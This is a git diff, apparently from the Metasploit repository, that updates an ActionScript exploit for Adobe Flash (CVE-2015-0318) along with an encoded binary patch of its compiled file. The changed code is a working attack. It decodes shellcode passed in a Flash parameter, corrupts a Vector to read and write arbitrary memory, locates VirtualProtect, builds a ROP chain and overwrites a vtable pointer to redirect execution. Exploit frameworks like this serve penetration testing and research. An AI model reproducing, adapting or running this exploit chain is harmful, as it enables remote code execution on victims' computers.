z7&K!p__;!HM_Sa^XBn`}QUQa?OF24L^r5~+I|r&>fx62CylFeCHv%L`*NjkZ;dC_s zuvjB*PXUi0!d|L{6;ErWPp}5iGbU3zG^ZlOyf1FbG(;*CxDEie0Me`=a)l!s2W_vc zU&2tx7<3UOo7d*B@X70I_nmmt{;NyVU!y3TWy;12>5|AeoV}lAXPSUwj(Le$^Y8)e%zrKvS zX0bbU63_}E^hy6YnufW5Tbg{=AG#{Ug(DGf(Z3CQ)R? zZ%U)fJO{e{6f}XPrkf7`~KmBTq(LT=EvuDqq*WF!ektlBvQvD(!jg*}B z?j(dfS^JlikYl-6y#M^^ux~M)%H;b2I({Hw+q3<_;KIT}*FtYsHa8ROK6>kIgq0hZ%UsH27sL`7OFv`JKlh6_GI>FR&I{C(wP|NONN zsjqzR{oj{A@RiU1oA$GB{!}l%{N^j_)epTn^^xyB`#OF7m21yvfA-Y14=cr@yaYdu z)Cn0sc#@FUX1*c+a1a2m*ZVrOufcx)1!3|F-Y(BgefOU@OlsbMc6#Nb*Z%?Op7#6r z_>Hb7aNf-)m%f8|pR0z`oskT+X~KCo{Ho-kKR+oK@za@0^+%ywE!})irNLwFj&y zm|eTqN@sJIRZg#<1*!zASTaAGGB0ZvW^+l~k|TYG^z@=wpz4&FxB3p9wxZdXm7_`e zm^OZHYWVDFYzEIhgw5T<6AYT6Q|AY<4G)gpW8mn}(D1nlr)}l!3v-djKmW)Qv zd*duG5JogRm$9b~AL(PWISX53CYQ~ov8Ri%oMq&*bGfJmJtsuRY%*oVps$x$}dfejTf+WNgv6*SutbimXK^_DVukVSiJNjG&JFkW(6kZ(WjkWo{8Yj+LEQ%IOZ1#^m|yBUva@Bhj%%WYT<6SO z-Wuh|yfI?gW9iv!&c@z|8Jn?eZJx{P6wMSaRPN`Kk6UagWto||SqCJD*i>vGn~NE| z8v(^Qc`q-VZvpovC{(^%Ep5&uqurwEk< z9BilWk`8s#L3)rzBrxftKKclqloMvMX+a$6XNT|U?dgi8Qq>P6bM~B>I+x4Zz`W6S2?E4Q_4c%GAE@z}v6#=w z&vyC_g%Wq62ntsFw=EAjWEQm=ha@8Q@Sva`Ny#)H@e z3mhvq4_+K=bw1Ks@~VE&3K|si3eK6EeT#9arOiZ92s-PY7xF_W^9{I!CV2YEyJ0g^ zu$d{?3uJy!xJsm<&-krD22xLp_rY$>>k zC}HM?V4EEknfjN^Yi^(oN`ui*-B{J&RY~Ka#y+T>jbkclxKEF$WCv}kYKk>kP4T9g zrbNTK7 z$*7CbDyFy@^)Ri5v0BFJ7^`Qjfw3KoH8Qr7u_nfv8Eau|H)DGk^D)-S*xnXo%=ST} zGUjKjjj{cV9boJrW9^J~FnR~0os0$;?P4^@Xo%5nMtd0TW%LlEhZ*f-jw6iT$>>o= z`x(89(PPYUoY4VBPcV9t(LqK}F*?NPX-0<`4Kq5z=qRIOjGkfiZbt86^j=2KGCI!a zIaU>9)#n+VV04;MleweK)R?Bs{TQQZMrRp)H}mG0H_yB_h}~m2Kr@ds?-k~KFY`XZ zyiYRvNy@xOnD;lJc@D~_pga%dH=%qQ%4eW_7Rqly`E4klgR%_eI+PbEYy4fxl+QzX z5z6m@>R*ELB`9Bp@)c_I$;}FLf0Y_e*%*@#;z^TIsa#2$m8=kPG*^j4H8{poo%akv zB+UR=p}K~6_(`PvbCgQOk55KUlExWpGEOkG+bCqBmkGskypo_2%a?yklJ=|qt5B}$ zbQvnCYOR8cHF1Mc;0gtmR|E6NHBd`(E!47H2el&CL#@gUP;2rI(CjYSi29{)7gw0v z1hpvR@v-@lmYCC(>OWBbuf^h8=R?aIYn=~Qjz1#C>%{oGaGVoOV)ZCiQ&7Ry6d6|O=c}w-+hVY? zd<_}2Em8mR>-9e=7T?197-tO}RFt!wbC{IR$Ye?0SX(jg!wCjX@b4QxPhrMNd4i_M zhGVP{D)>pl?LiY3;;n_ay8tD8frJlIbD|J$slXgSOvkOb`{w$}s_E7xox+G;um4uD z2%2Jw>Tv&^QV2cRaVum|-;$iB*r;gCt6fD#Sf)Ka=bKwpbJ-bwGkWKP`92TRP!Vr-GXN@=hV%u-U79 zo1V9FLLuG^ia-z*vA$&F|rQM)LTCpP2WHz7OW1Dy8LwyEJ2? zJY(nPi~^`B+)i(&ZSqSm)PJu`{wk19-rboTzZ>M6RD}iO6K7P4hA71M2uUS#!om#z zW=Hq|iq-*0_Pz96M~#b+b_Dz+KGC`Br5Z>j!0{4rEC?5gPb3;~?x+WHNg>`==-7zw z@3C4Lfe1JLjN*nK+6pF)xV12!<8ZUye3>`j=KyxcjNd2R2Xd) zjkZxX+I*$aAet#Cqqi)!Cq5Cs-+!fcC-;^G&a6CuYk6vcA*u$p;(->o@+}_7lCKs{ zDV`{w$o=4#Zc0$7oI;DJ5e+CbU4=hF`}J z^HhWwBFXJ>7jV8@vx7_X9$^+xw^Uk!i(Fa+Y1@7(Ul(hP(l1DVBz;r5_>eM9;B;>i zNhc8^>m*8)N#c-I!?7EJBz_{O-moEy`*$sePf>egWepopAB2um(GACsD1J)psDhP> zm4+3ADTsvH%8-OawsB z^-+$584-p&uh)O4SQLBRSo4#*5|ExTmD;rKcn3szR=IzDc%gKGs`=ENqX1z82e z0#y}|9;mK>jDWiWas)gTkTc+|fLuYn0;&qsR6x~%+6u@WsH=cHf%*!_8)&G2YJx@u zR2$e)0o4T>E1>$o&I+g@=%|2p1ez+K#-OtT+8JoBfSQ7pT51mLs(^NF(^*TPr2^U= ztkmG1V5J6qYZX9iuu`3SA$M*;`+}fcICoTCl@y2fsU78m2l#1P!35WvRt2Pq(+Crg zE*b-o;j}|QPSLnTQze>e(YQt95skMn>3|RP83#=?7vP&AU4Zl972Af%R|J=?}w z`J}x#$q(H#4w7gqj1iuH3*#LS%7yS91isKb1N-XW`ZNMjagBnqZUg$+i zq&d?oq5fd#DvG4W50|3wgLIjbBC_*CwDZF>d`tormnqAU`%H<*ZtZu7_}^hUJ~QixEN)uQNn(tjQwb7 z-{CW1BAlU6)<8H2+j0WU$8e@o%oMrUS<)c&{6yy()KKY@8F?H1o1L;-E8dOQRc3+(33mjdZho_ESS<(=}YS;ohfq>B83X%0?L zh#4P*Pl*2{e4QX+{klkMJYN{^ly}NI<^OGgqiqUb7~p#AgT^b)5`jH|J(w&Y8GIa* z0X{C={sQwX-S!0IFM50>BHFPY0?bnze#rxOQaIqO>9XuEiies{l(GxvoaSmmq;LOw zQTvbL4~oSR>3Qih4WDbc7<*p2+3@WKLcCkIP>aY0i4#R5Geqqr38HBvNtjF?Bf3T| z;a?I`#1STG;?zinxHOU_RT`Nk)f#y>acd+;JQ~U4n|QTEslKlevdDB#Xxa`<&xNMv zL(>bPX&3yvNLu(W;e@+^n^IX3&%GY(>V;6}4f+6uJD;}i(kDYD{3z&Ea<&q-zvlpt>AfX-Q&TlX~22C0=F9Q-DvykuhY8k z!|fB6YLHb$eF1LRg+lyrq7Uc_@jm}CejvOBxW1L;#1W1?BIdUhK1^%j0*&{DKCF(6 z0ND}v1|;s}ba#p?Ew1xdQmv&A!9S;PQ>~lb32_yjF|?fB*C{-mrDJdMmJEL=g`Iyjwc? zcHoObU3tdgh>F*ABw(CY_nhS~OMM(A-V>H#lFLtO@o5UMuJCDk4X(~Bb#VWW=s>%S z^LF#Qzlw+M?HnUIEciuymMby!2&PdZqT5ji;vAgP={Y6VjyRY75)f45ShZNry^6Ol zL>NFk8gcLk21mr;tx>@xg7<`Pl%5zG6_=v^K}nI~Ed?tbD+6w)Q3v*%!kR)du#UaH zXO*>;ew)8jq)u6pDSu^1X}A}5@IUl#~3CckAQSkIzy35SG10( zqw|Z@T#Ps(I{x7R^?;Ah5v~~nbOH0mFH_hS?i98c(d+*nw}+H{oHF7xA7Akk^Kp+C z!yx|nO8mY$e2l^ApsVnE$O@F&H;P4ILpRyH0Y=6dyA-R^{plC?UW(d z8hCIPRuYE_h1GCBO&l(a--W^2R0`I~DmP9Y0o40~>mn89EFFy~rNQ$D?l=%%5 zRud-*Yl)LUxm%`UBt9^C)-Q$6!VUhU`Cb^=BP$AfkQ;D)#V?CjErpQIm#Mr`h@WuP z!lnEybXKnWr59l$Bm=l5;t(Rxlmn~r_l|n1G0$$ktG4LCYLwn}Dts|Ud?;5ZCY4&W z{i=9rbMimn=r7tEE1$4$!P+;xKPeX1+KTiB?4?zKZ1QILy{?n4L%ZSGhmNrl9^!Eh zekc*LI=VV7K`1^!m#@JNK>LE%tzyyhSwYUT2=av}YlIoo5{JYTA%cf<`oAZtxt&N1 zub{Kt@=Oit0dL7%9X@(Qo!k;2j>}H$g2ig4HOH9zbS*pIoAXo6?d91Ky~`zrFMSC3_M& J{|(t_5?Vyxu#W%$ diff --git a/external/source/exploits/CVE-2015-0318/Main.as b/external/source/exploits/CVE-2015-0318/Main.as index e6f341930c..9bf0562867 100644 --- a/external/source/exploits/CVE-2015-0318/Main.as +++ b/external/source/exploits/CVE-2015-0318/Main.as @@ -1,12 +1,13 @@ package { + import mx.utils.Base64Decoder; import flash.display.*; import flash.utils.ByteArray; import flash.external.ExternalInterface; import mx.utils.Base64Decoder; public class Main extends Sprite - { + { private var i:int; private var j:int; @@ -36,12 +37,8 @@ package private var junk:Array = new Array(); private var junk_idx:int = 0; - public static function Alert(message:String):void { - ExternalInterface.call('debug_alert', message); - } - public static function Debug(message:String):void { - ExternalInterface.call('debug_print', message); + ExternalInterface.call('console.log', message); } public function MakeRegex(c:String):String { @@ -392,7 +389,7 @@ package // TODO: we can optimise here as we know the alignment of the // magic values. - Alert(' [-] ' + region_base.toString(16) + ' ' + region_top.toString(16) + '[' + region_rtop.toString(16) + ']'); + Debug(' [-] ' + region_base.toString(16) + ' ' + region_top.toString(16) + '[' + region_rtop.toString(16) + ']'); for (var ptr:uint = region_base; ptr < region_top - 16; ptr += 4) { if (m.read_dword(ptr) == 0xdecafbad @@ -409,16 +406,6 @@ package return 0; } - - public function GetShellcodeParam():String { - var b64:Base64Decoder = new Base64Decoder(); - var payload:String = ""; - Alert("Gonna decode"); - b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh); - Alert("Finished Decode"); - payload = b64.toByteArray().toString(); - return payload; - } public function WriteShellcode(v:Vector., i:uint, ptr:uint, fun:uint):void { @@ -472,12 +459,17 @@ package v[i++] = fun; v[i++] = 0x9090e0ff; // FFE0 jmp eax } - + + public function GetPayload():String { + var b64:Base64Decoder = new Base64Decoder(); + var p:String = LoaderInfo(this.root.loaderInfo).parameters.sh; + b64.decode(p); + var payload:String = b64.toByteArray().toString(); + return payload; + } + public function Main() { - Alert("1"); - var sh:String = GetShellcodeParam(); - Alert("2"); - Debug("Shellcoe: " + sh.toString()); + var payload:String = GetPayload(); i = 0; @@ -488,7 +480,7 @@ package return; } - Alert('hai'); + Debug("Corrupting Vector"); var v:Vector. = CorruptVector(r); if (v == null) { @@ -496,7 +488,6 @@ package return; } - Alert("Memory"); var m:Memory = new Memory(v, v[0], 0x6e); // at this point we have an absolute read/write primitive letting @@ -532,10 +523,10 @@ package var virtual_protect:uint = p.GetImport('KERNEL32.dll', 'VirtualProtect'); Debug(' [-] ' + virtual_protect.toString(16) + ' kernel32!VirtualProtect'); - + + // Find this in Flash // 81 c4 40 00 00 00 add esp, 40h // c3 ret - var gadget_bytes:ByteArray = new ByteArray(); gadget_bytes.length = 7; gadget_bytes.writeByte(0x81); @@ -582,22 +573,22 @@ package var a:uint = 0x61616161; pwned.Rop( - a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, - a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, - a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, - a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, - a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, - a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, - a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, - a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, - a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, - a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, - a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, - a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, - a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, - a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, - a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, - a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a); + a, a, a, a, a, a, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, + ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, + ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, + ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, + ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, + ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, + ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, + ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, + ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, + ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, + ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, + ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, + ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, + ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, + ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, + ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, add_esp_40h_ret); // overwrite the method pointer m.write_dword(vtable_ptr + 4, add_esp_40h_ret);